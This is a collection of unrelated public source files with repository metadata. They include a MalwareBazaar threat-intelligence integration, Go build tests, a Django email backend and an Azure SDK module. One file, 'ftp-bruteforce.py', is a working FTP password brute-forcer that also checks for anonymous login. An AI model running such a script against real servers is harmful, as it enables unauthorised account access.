17ae1f4270a5e2ebf48e65265aafc3399ecba836 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /E9FwvGyad5CDbiH4C_14.py | 47f2553b08320fb3dbcb4e7c16ad17e66bc52e21 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 157 | py |
def block(lst):
lista = [list(i) for i in list(zip(*lst)) if 2 in i]
q = 0
for i in lista:
q += len(i) - (i.index(2) + 1)
return q
| [
"[email protected]"
] | |
aad3ab1abf6d1299b48f107d036bf3d579323977 | 2a1b8a671aceda6bc446f8ce26400aa84fa444a6 | /Packs/MalwareBazaar/Integrations/MalwareBazaar/MalwareBazaar.py | 99c29c578cf90e95546b390eaa97f99d11e81baa | [
"MIT"
] | permissive | demisto/content | 6d4722d46f0ff0beea2748e9f7de585bf91a78b4 | 890def5a0e0ae8d6eaa538148249ddbc851dbb6b | refs/heads/master | 2023-09-04T00:02:25.618032 | 2023-09-03T21:56:22 | 2023-09-03T21:56:22 | 60,525,392 | 1,023 | 1,921 | MIT | 2023-09-14T20:55:24 | 2016-06-06T12:17:02 | Python | UTF-8 | Python | false | false | 12,931 | py | import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
import copy
import urllib3
QUERIES = {
"tag": "get_taginfo",
"signature": "get_siginfo",
"file_type": "get_file_type",
"clamav": "get_clamavinfo",
"imphash": "get_imphash",
"yara_rule": "get_yarainfo",
"issuer_cn": "get_issuerinfo"
}
EXCEPTIONS_MESSAGES = {
'illegal_sha256_hash': 'Illegal SHA256 hash provided.',
'file_not_found': 'The file was not found or is unknown to MalwareBazaar.',
'hash_not_found': 'The file (hash) you wanted to query is unknown to MalwareBazaar.',
'illegal_hash': 'The hash you provided is not a valid SHA256 hash.',
'user_blacklisted': 'Your API key is blacklisted.',
'no_results': 'Your query yield no results.',
'not_found': 'The value you wanted to query is unknown to MalwareBazaar.',
'illegal': 'The text you provided is not valid.'
}
VENDOR_NAME = 'MalwareBazaar'
LIST_HEADERS = ['md5_hash', 'sha256_hash', 'sha1_hash', 'file_name', 'file_type', 'file_size', 'tags', 'first_seen',
'last_seen']
FILE_HEADERS = ['md5_hash', 'sha256_hash', 'sha1_hash', 'file_name', 'file_type', 'file_size', 'tags', 'first_seen',
'last_seen', 'signature', 'ssdeep', 'reporter', 'imphash', 'yara_rules_names']
class Client(BaseClient):
def __init__(self, server_url, verify, proxy, headers, api_key):
self.api_key = api_key
super().__init__(base_url=server_url, verify=verify, proxy=proxy, headers=headers)
def file_request(self, hash):
response = self._http_request('POST',
files={
'query': (None, "get_info"),
'hash': (None, hash)
})
return response
def malwarebazaar_download_sample_request(self, sha256_hash):
response = self._http_request('POST',
files={
'query': (None, "get_file"),
'sha256_hash': (None, sha256_hash)
},
resp_type="response")
return response
def malwarebazaar_comment_add_request(self, sha256_hash, comment):
if self.api_key is None:
raise Exception('API Key is required for this command')
response = self._http_request('POST',
headers={"API-KEY": self.api_key},
files={
'query': (None, "add_comment"),
'sha256_hash': (None, sha256_hash),
'comment': (None, comment)
})
return response
def malwarebazaar_samples_list_request(self, sample_input, value, limit, query):
files = {
'query': (None, query),
sample_input: (None, value),
}
if not sample_input == 'issuer_cn':
files.update({'limit': (None, limit)})
response = self._http_request('POST',
files=files)
return response
def file_process(hash, reliability, raw_response, response_data) -> CommandResults:
"""
creates CommandResults for every file in the list inserted to file_command
Args:
hash:
raw_response:
response_data:
Returns:
CommandResults for the relevant file
"""
dbot_score = Common.DBotScore(
indicator=hash,
indicator_type=DBotScoreType.FILE,
integration_name=VENDOR_NAME,
score=Common.DBotScore.BAD,
reliability=reliability,
malicious_description=response_data.get('comment')
)
signature = response_data.get('signature')
relationship = EntityRelationship(name='indicator-of',
entity_a=hash,
entity_a_type='File',
entity_b=signature,
entity_b_type=FeedIndicatorType.indicator_type_by_server_version(
"STIX Malware"),
source_reliability=reliability,
brand=VENDOR_NAME)
table_name = f'{VENDOR_NAME} File reputation for: {hash}'
human_readable_data = copy.deepcopy(response_data)
human_readable_data.update({'yara_rules_names': []})
rules = human_readable_data.get('yara_rules', [])
rules = rules if rules else []
for rule in rules:
human_readable_data.get('yara_rules_names').append(rule.get('rule_name'))
md = tableToMarkdown(table_name, t=human_readable_data, headerTransform=string_to_table_header, removeNull=True,
headers=FILE_HEADERS)
file_object = Common.File(md5=response_data.get('md5_hash'), sha256=response_data.get('sha256_hash'),
sha1=response_data.get('sha1_hash'), size=response_data.get('file_size'),
file_type=response_data.get('file_type'), dbot_score=dbot_score,
relationships=[relationship])
return CommandResults(
outputs_prefix='MalwareBazaar.File',
outputs_key_field='md5_hash',
outputs=response_data,
raw_response=raw_response,
indicator=file_object,
relationships=[relationship],
readable_output=md
)
def check_query_status(response, is_list_command=False, sample_type=None):
"""
checks whether the request to the API returned with the proper result
Args:
sample_type: string, type of sample (tag, signature, etc.)
is_list_command: bool
response: response from API
"""
not_found_error = '_not_found'
illegal_error = 'illegal_'
query_status = response.get("query_status")
if not query_status == "ok" and not query_status == "success":
if is_list_command:
if query_status == sample_type + not_found_error:
raise Exception(EXCEPTIONS_MESSAGES.get('not_found'))
if query_status == sample_type + illegal_error:
raise Exception(EXCEPTIONS_MESSAGES.get('illegal'))
if query_status in EXCEPTIONS_MESSAGES:
raise Exception(EXCEPTIONS_MESSAGES.get(query_status))
else:
raise Exception(query_status)
def file_command(client: Client, args: Dict[str, Any]) -> List[CommandResults]:
"""
Args:
client:
args: file - list of file hashes
Returns:
file reputation for the given hashes
"""
reliability = demisto.params().get('integrationReliability', DBotScoreReliability.A)
if DBotScoreReliability.is_valid_type(reliability):
reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability)
else:
raise Exception("Please provide a valid value for the Source Reliability parameter.")
file_list = argToList(args.get('file'))
command_results: List[CommandResults] = []
for hash in file_list:
raw_response = client.file_request(hash)
if raw_response.get('query_status') == 'hash_not_found':
command_results.append(create_indicator_result_with_dbotscore_unknown(hash, DBotScoreType.FILE, reliability))
else:
check_query_status(raw_response)
response_data = raw_response.get('data')[0]
if file_name := response_data.get('file_name'):
response_data['file_name'] = '' if file_name == 'file' else file_name
command_results.append(file_process(hash, reliability, raw_response, response_data))
return command_results
def malwarebazaar_download_sample_command(client: Client, args: Dict[str, Any]) -> CommandResults:
"""
Args:
client:
args: sha256_hash of file
Returns:
zip file contains the malware sample from MalwareBazaar
"""
sha256_hash = args.get("sha256_hash")
response = client.malwarebazaar_download_sample_request(sha256_hash)
filename = f'{sha256_hash}.zip'
return fileResult(filename, response.content)
def malwarebazaar_comment_add_command(client: Client, args: Dict[str, Any]) -> CommandResults:
"""
Args:
client:
args: sha256_hash of file, comment to add in context of this file
Returns:
query status of the request to MalwareBazaar (success or error)
"""
sha256_hash = args.get("sha256_hash")
comment = args.get("comment")
response = client.malwarebazaar_comment_add_request(sha256_hash, comment)
check_query_status(response)
readable_output = f'Comment added to {sha256_hash} malware sample successfully'
outputs = {
'sha256_hash': sha256_hash,
'comment': comment,
}
return CommandResults(
outputs_prefix='MalwareBazaar.MalwarebazaarCommentAdd',
outputs_key_field='sha256_hash',
outputs=outputs,
readable_output=readable_output,
raw_response=response,
)
def malwarebazaar_samples_list_command(client: Client, args: Dict[str, Any]) -> CommandResults:
"""
Args:
client:
args: sample_type - {clamav, file_type, imphash, signature, tag, yara_rule}
sample_value
limit (optional) - number of results (default 50)
Returns:
query results from API
"""
sample_input = args.get("sample_type") or ''
value = args.get("sample_value")
limit = arg_to_number(args.get("limit")) if "limit" in args else None
page = arg_to_number(args.get("page")) if "page" in args else None
page_size = arg_to_number(args.get("page_size")) if "page_size" in args else None
# If a limit was provided, request that many results from the API; otherwise use pagination
# (if neither is given, 50 results are requested by default).
if limit is None:
if page is not None and page_size is not None:
if page <= 0:
raise Exception('Chosen page number must be greater than 0')
limit = page_size * page
else:
limit = 50
# 1000 is the maximum number of results the API can return
limit = min(limit, 1000)
query = QUERIES.get(sample_input)
response = client.malwarebazaar_samples_list_request(sample_input, value, limit, query)
check_query_status(response, True, args.get('sample_type'))
response_data = response.get('data')
# take required results from response if pagination by page and page_size
if page is not None and page_size is not None:
response_data = response_data[-1 * page_size:]
readable_output = tableToMarkdown('Sample List', t=response_data, headerTransform=string_to_table_header,
removeNull=True, headers=LIST_HEADERS)
return CommandResults(
outputs_prefix='MalwareBazaar.MalwarebazaarSamplesList',
outputs_key_field='sha256_hash',
readable_output=readable_output,
outputs=response_data,
raw_response=response
)
def test_module(client: Client) -> None:
if client.api_key:
response = client.malwarebazaar_comment_add_request(
"094fd325049b8a9cf6d3e5ef2a6d4cc6a567d7d49c35f8bb8dd9e3c6acf3d78d",
"test comment")
else:
response = client.malwarebazaar_samples_list_request('tag', 'TrickBot', '2', QUERIES.get('tag'))
check_query_status(response)
return_results('ok')
def main() -> None:
params: Dict[str, Any] = demisto.params()
args: Dict[str, Any] = demisto.args()
url = params.get('url')
api_key = params.get('credentials', {}).get('password') or None
verify_certificate: bool = not params.get('insecure', False)
proxy = params.get('proxy', False)
command = demisto.command()
demisto.debug(f'Command being called is {command}')
try:
urllib3.disable_warnings()
client: Client = Client(urljoin(url, '/api/v1/'), verify_certificate, proxy, headers={}, api_key=api_key)
commands = {
'file': file_command,
'malwarebazaar-download-sample': malwarebazaar_download_sample_command,
'malwarebazaar-comment-add': malwarebazaar_comment_add_command,
'malwarebazaar-samples-list': malwarebazaar_samples_list_command,
}
if command == 'test-module':
test_module(client)
elif command in commands:
return_results(commands[command](client, args))
else:
raise NotImplementedError(f'{command} command is not implemented.')
except Exception as e:
return_error(str(e))
if __name__ in ['__main__', 'builtin', 'builtins']:
main()
| [
"[email protected]"
] | |
f4823491f0f44b3d340a720dbc47cf29a5a8e325 | 55540f3e86f1d5d86ef6b5d295a63518e274efe3 | /toolchain/riscv/MSYS/riscv64-unknown-elf/lib/rv32imfdc_zba_zbb/ilp32d/libstdc++.a-gdb.py | 8e9d75e886ed14abcb55b187bbbe376b0ca67b81 | [
"Apache-2.0"
] | permissive | bouffalolab/bl_iot_sdk | bc5eaf036b70f8c65dd389439062b169f8d09daa | b90664de0bd4c1897a9f1f5d9e360a9631d38b34 | refs/heads/master | 2023-08-31T03:38:03.369853 | 2023-08-16T08:50:33 | 2023-08-18T09:13:27 | 307,347,250 | 244 | 101 | Apache-2.0 | 2023-08-28T06:29:02 | 2020-10-26T11:16:30 | C | UTF-8 | Python | false | false | 2,772 | py | # -*- python -*-
# Copyright (C) 2009-2020 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import gdb
import os
import os.path
pythondir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--build-binary-packages--parameterized/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-10.2.0-2020.12.8-x86_64-w64-mingw32/share/gcc-10.2.0/python'
libdir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--build-binary-packages--parameterized/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-10.2.0-2020.12.8-x86_64-w64-mingw32/riscv64-unknown-elf/lib/rv32imfdc_zba_zbb/ilp32d'
# This file might be loaded when there is no current objfile. This
# can happen if the user loads it manually. In this case we don't
# update sys.path; instead we just hope the user managed to do that
# beforehand.
if gdb.current_objfile () is not None:
# Update module path. We want to find the relative path from libdir
# to pythondir, and then we want to apply that relative path to the
# directory holding the objfile with which this file is associated.
# This preserves relocatability of the gcc tree.
# Do a simple normalization that removes duplicate separators.
pythondir = os.path.normpath (pythondir)
libdir = os.path.normpath (libdir)
prefix = os.path.commonprefix ([libdir, pythondir])
# In some bizarre configuration we might have found a match in the
# middle of a directory name.
if prefix[-1] != '/':
prefix = os.path.dirname (prefix) + '/'
# Strip off the prefix.
pythondir = pythondir[len (prefix):]
libdir = libdir[len (prefix):]
# Compute the ".."s needed to get from libdir to the prefix.
dotdots = ('..' + os.sep) * len (libdir.split (os.sep))
objfile = gdb.current_objfile ().filename
dir_ = os.path.join (os.path.dirname (objfile), dotdots, pythondir)
if not dir_ in sys.path:
sys.path.insert(0, dir_)
# Call a function as a plain import would not execute body of the included file
# on repeated reloads of this object file.
from libstdcxx.v6 import register_libstdcxx_printers
register_libstdcxx_printers(gdb.current_objfile())
| [
"[email protected]"
] | |
0d1bfe45270d76b88c774d848ede4a38ee8cb120 | 60364a7089bc359494a4a42ba6d79c2fd0b84185 | /django_extended/emailing/backend.py | ced758319243991dd06e01a4e9d2d45cbf3c16e2 | [
"BSD-3-Clause"
] | permissive | dalou/django-extended | 4936c77535bc4421a9f003da58a49629bc7996df | a7ba952ea7089cfb319b4615ae098579c9ab14f9 | refs/heads/master | 2021-10-27T09:33:28.615992 | 2015-12-14T14:55:33 | 2015-12-14T14:55:33 | 46,408,921 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,698 | py | from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.mail.backends.base import BaseEmailBackend
from django.core.mail.message import sanitize_address, DEFAULT_ATTACHMENT_MIME_TYPE
from django.core.mail.backends.smtp import EmailBackend
from .models import *
class DevBackend(EmailBackend):
def route_recipients(self, recipients):
for i,r in enumerate(recipients):
recipients[i] = "[email protected], [email protected]"
return recipients
def _send(self, message):
orginial_receiver = ", ".join(message.to)
message.to = self.route_recipients(message.to)
message.cc = self.route_recipients(message.cc)
message.bcc = self.route_recipients(message.bcc)
message.subject += ' <orginal receivers : %s>' % orginial_receiver
super(DevBackend, self)._send(message)
class ProductionBackend(EmailBackend):
def route_recipients(self, recipients):
# if getattr(settings, 'EMAIL_DOMAIN_ONLY', False):
# receivers = ", ".join(list(set(TestEmail.objects.all().values_list('email', flat=True))))
# # for i,r in enumerate(recipients):
# # if not r.endswith('@%s' % PROJECT_DOMAIN):
# # recipients = settings.DEFAULT_FROM_EMAIL
return recipients
def _send(self, message):
# if getattr(settings, 'EMAIL_DOMAIN_ONLY', False):
# message.to = self.route_recipients(message.to)
# message.cc = self.route_recipients(message.cc)
# message.bcc = self.route_recipients(message.bcc)
super(ProductionBackend, self)._send(message) | [
"[email protected]"
] | |
f51a2ebb6f85f0f5d06ee9ac9dd3373d5880f1d0 | d17724b2ce056b435f57b16fb0cbea32e44a29c6 | /Gun4PY/ftp-bruteforce.py | 0f673dce18e4b54b0c7f64d8571451b8a5f6f497 | [] | no_license | UgurCIL/Examples | 27264d89131b4aaff46f91705a03779c4e825ad6 | c1722a519836a24c8a946380e6cbcd6da963f0c5 | refs/heads/master | 2020-04-24T15:28:17.288204 | 2019-02-22T13:30:35 | 2019-02-22T13:30:35 | 172,069,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,018 | py | import sys
from ftplib import FTP
def checkAnonymous(dstIP):
try:
ftp = FTP(dstIP)
ftp.login()
print "[*] Anonymous giris acik"
print "[*] Kullanici Adi : anonymous"
print "[*] Parola : anonymous"
ftp.close()
except:
pass
def ftpLogin(dstIP, user, passw):
try:
ftp = FTP(dstIP)
ftp.login(user, passw)
ftp.quit()
print "[!] Kullanici/Parola bulundu."
print "[!] Kullanici Adi : " + user
print "[!] Parola : " + passw
sys.exit(0)
except:
pass
def bruteForce(dstIP, user, wordL):
try:
wordlist = open(wordL, "r")
words = wordlist.readlines()
for word in words:
word = word.strip()
ftpLogin(dstIP, user, word)
except:
print "[-] Eslesen parola bulunamadi.."
sys.exit(0)
dstIP = raw_input("FTP sunucu adresi : ")
user = raw_input("Kullanici adi : ")
wordlist = raw_input("Parola listesi : ")
bruteForce(dstIP, user, wordlist)
checkAnonymous(dstIP)
| [
"[email protected]"
] | |
1925c14fb7975bde7b1a13295e923c9cc4a022d7 | 338be5c20c24e10f11f0fea4a1a156dc4e4a9922 | /greenleaf/config/gunicorn.conf.py | ff0f6aab1ec9aec6ec500de100e1811f081f1fa0 | [] | no_license | Jimiliani/my_python | a532c332683a0f795bff5ed6b15db5c961e017d4 | 28f078d9499854b2b09fbd50686beb8cfdc12227 | refs/heads/master | 2022-10-27T08:38:04.449331 | 2020-10-06T10:41:10 | 2020-10-06T10:41:10 | 241,277,471 | 0 | 1 | null | 2022-10-15T16:06:02 | 2020-02-18T05:07:19 | Python | UTF-8 | Python | false | false | 66 | py | bind = '127.0.0.1:8000'
workers = 2
user = 'dima'
timeout = 60
| [
"[email protected]"
] | |
d14bf3bde060c5cda07a825296dee074f729f51f | 5db0fab37c2b8a618d85d3b60fab9f806c416474 | /src/python/pants/backend/go/util_rules/build_pkg_test.py | be4d1f7e5dab9561e76f8e82e785b6d2d8bc7090 | [
"Apache-2.0"
] | permissive | pantsbuild/pants | 4988d1ac5474ec95f94ce2218aeb759401e4b011 | 98cbda8545f0d58c586ed2daa76fefd729d5e0d5 | refs/heads/main | 2023-09-05T03:44:17.646899 | 2023-09-01T19:52:09 | 2023-09-01T19:52:09 | 7,209,075 | 2,708 | 593 | Apache-2.0 | 2023-09-14T19:33:33 | 2012-12-17T17:39:04 | Python | UTF-8 | Python | false | false | 6,371 | py | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os.path
from textwrap import dedent
import pytest
from pants.backend.go import target_type_rules
from pants.backend.go.target_types import GoModTarget
from pants.backend.go.util_rules import (
assembly,
build_pkg,
first_party_pkg,
go_mod,
import_analysis,
link,
sdk,
third_party_pkg,
)
from pants.backend.go.util_rules.build_opts import GoBuildOptions
from pants.backend.go.util_rules.build_pkg import (
BuildGoPackageRequest,
BuiltGoPackage,
FallibleBuiltGoPackage,
)
from pants.engine.fs import Snapshot
from pants.engine.rules import QueryRule
from pants.testutil.rule_runner import RuleRunner
from pants.util.strutil import path_safe
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*sdk.rules(),
*assembly.rules(),
*build_pkg.rules(),
*import_analysis.rules(),
*go_mod.rules(),
*first_party_pkg.rules(),
*link.rules(),
*third_party_pkg.rules(),
*target_type_rules.rules(),
QueryRule(BuiltGoPackage, [BuildGoPackageRequest]),
QueryRule(FallibleBuiltGoPackage, [BuildGoPackageRequest]),
],
target_types=[GoModTarget],
)
rule_runner.set_options([], env_inherit={"PATH"})
return rule_runner
def assert_built(
rule_runner: RuleRunner, request: BuildGoPackageRequest, *, expected_import_paths: list[str]
) -> None:
built_package = rule_runner.request(BuiltGoPackage, [request])
result_files = rule_runner.request(Snapshot, [built_package.digest]).files
expected = {
import_path: os.path.join("__pkgs__", path_safe(import_path), "__pkg__.a")
for import_path in expected_import_paths
}
assert dict(built_package.import_paths_to_pkg_a_files) == expected
assert sorted(result_files) == sorted(expected.values())
def test_build_pkg(rule_runner: RuleRunner) -> None:
transitive_dep = BuildGoPackageRequest(
import_path="example.com/foo/dep/transitive",
pkg_name="transitive",
dir_path="dep/transitive",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"dep/transitive/f.go": dedent(
"""\
package transitive
func Quote(s string) string {
return ">>" + s + "<<"
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(),
minimum_go_version=None,
)
direct_dep = BuildGoPackageRequest(
import_path="example.com/foo/dep",
pkg_name="dep",
dir_path="dep",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"dep/f.go": dedent(
"""\
package dep
import "example.com/foo/dep/transitive"
func Quote(s string) string {
return transitive.Quote(s)
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(transitive_dep,),
minimum_go_version=None,
)
main = BuildGoPackageRequest(
import_path="example.com/foo",
pkg_name="foo",
dir_path="",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"f.go": dedent(
"""\
package foo
import "example.com/foo/dep"
func main() {
dep.Quote("Hello world!")
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(direct_dep,),
minimum_go_version=None,
)
assert_built(
rule_runner, transitive_dep, expected_import_paths=["example.com/foo/dep/transitive"]
)
assert_built(
rule_runner,
direct_dep,
expected_import_paths=["example.com/foo/dep", "example.com/foo/dep/transitive"],
)
assert_built(
rule_runner,
main,
expected_import_paths=[
"example.com/foo",
"example.com/foo/dep",
"example.com/foo/dep/transitive",
],
)
def test_build_invalid_pkg(rule_runner: RuleRunner) -> None:
invalid_dep = BuildGoPackageRequest(
import_path="example.com/foo/dep",
pkg_name="dep",
dir_path="dep",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot({"dep/f.go": "invalid!!!"}).digest,
s_files=(),
direct_dependencies=(),
minimum_go_version=None,
)
main = BuildGoPackageRequest(
import_path="example.com/foo",
pkg_name="main",
dir_path="",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"f.go": dedent(
"""\
package main
import "example.com/foo/dep"
func main() {
dep.Quote("Hello world!")
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(invalid_dep,),
minimum_go_version=None,
)
invalid_direct_result = rule_runner.request(FallibleBuiltGoPackage, [invalid_dep])
assert invalid_direct_result.output is None
assert invalid_direct_result.exit_code == 1
assert (
invalid_direct_result.stdout
== "dep/f.go:1:1: syntax error: package statement must be first\n"
)
invalid_dep_result = rule_runner.request(FallibleBuiltGoPackage, [main])
assert invalid_dep_result.output is None
assert invalid_dep_result.exit_code == 1
assert (
invalid_dep_result.stdout == "dep/f.go:1:1: syntax error: package statement must be first\n"
)
| [
"[email protected]"
] | |
f6bc336f85c826b416c7a82c6d5707a2e558c142 | cad999eacee16dc0e001a57f50b5d8b0f4d4ebf6 | /p202.py | a2cc8d0b585a2940e0c568ce938cd4db057be5f3 | [] | no_license | divyanarra0/pythonprogram | 8694a41ba3b39eb44a94a693eac3f7f5f18b588b | 10d8f59a472ccd4548771bad29be84a1a44854d8 | refs/heads/master | 2020-03-27T10:32:21.664657 | 2019-05-14T07:31:00 | 2019-05-14T07:31:00 | 146,427,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | def isVowel(c):
c = c.lower()
if (c == 'a' or c == 'e' or
c == 'i' or c == 'o' or c == 'u'):
return True
return False
# Function to return first X vowels
def firstXvowels(s, x):
# String to store first X vowels
result = ""
for i in range(0, len(s), 1):
# If s[i] is a vowel then
# append it to the result
if (isVowel(s[i])):
result += s[i]
# If the desired length is reached
if (len(result) == x):
return result
# If total vowels are < X
return "-1"
# Driver code
if __name__ == '__main__':
str = "asdaqrew"
x = 3
print(firstXvowels(str, x))
| [
"[email protected]"
] | |
7dc0c27e821890eced9d0802e8432f93546a7563 | 3ce946b7fac93c237a073c5395ba2f3d293a3c52 | /src/cosmosdb-preview/azext_cosmosdb_preview/vendored_sdks/azure_mgmt_cosmosdb/operations/_collection_operations.py | cb47c68b013ff541760c6fa0f4aa019997d88c17 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | imabedalghafer/azure-cli-extensions | a7e05873aaf1bfa164e89f8fe80a80e7240abc78 | 017848c33388d48b382414db66656965f1c1874f | refs/heads/main | 2022-11-06T11:43:14.960651 | 2022-10-17T12:12:55 | 2022-10-17T12:12:55 | 403,272,601 | 2 | 0 | MIT | 2021-09-05T09:59:12 | 2021-09-05T09:59:11 | null | UTF-8 | Python | false | false | 21,317 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar
from urllib.parse import parse_qs, urljoin, urlparse
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
from .._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_metrics_request(
resource_group_name: str,
account_name: str,
database_rid: str,
collection_rid: str,
subscription_id: str,
*,
filter: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2022-08-15-preview")) # type: str
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/databases/{databaseRid}/collections/{collectionRid}/metrics",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"accountName": _SERIALIZER.url(
"account_name", account_name, "str", max_length=50, min_length=3, pattern=r"^[a-z0-9]+(-[a-z0-9]+)*"
),
"databaseRid": _SERIALIZER.url("database_rid", database_rid, "str"),
"collectionRid": _SERIALIZER.url("collection_rid", collection_rid, "str"),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
_params["$filter"] = _SERIALIZER.query("filter", filter, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_usages_request(
resource_group_name: str,
account_name: str,
database_rid: str,
collection_rid: str,
subscription_id: str,
*,
filter: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2022-08-15-preview")) # type: str
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/databases/{databaseRid}/collections/{collectionRid}/usages",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"accountName": _SERIALIZER.url(
"account_name", account_name, "str", max_length=50, min_length=3, pattern=r"^[a-z0-9]+(-[a-z0-9]+)*"
),
"databaseRid": _SERIALIZER.url("database_rid", database_rid, "str"),
"collectionRid": _SERIALIZER.url("collection_rid", collection_rid, "str"),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
if filter is not None:
_params["$filter"] = _SERIALIZER.query("filter", filter, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_metric_definitions_request(
resource_group_name: str,
account_name: str,
database_rid: str,
collection_rid: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2022-08-15-preview")) # type: str
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/databases/{databaseRid}/collections/{collectionRid}/metricDefinitions",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"accountName": _SERIALIZER.url(
"account_name", account_name, "str", max_length=50, min_length=3, pattern=r"^[a-z0-9]+(-[a-z0-9]+)*"
),
"databaseRid": _SERIALIZER.url("database_rid", database_rid, "str"),
"collectionRid": _SERIALIZER.url("collection_rid", collection_rid, "str"),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
class CollectionOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.cosmosdb.CosmosDBManagementClient`'s
:attr:`collection` attribute.
"""
models = _models
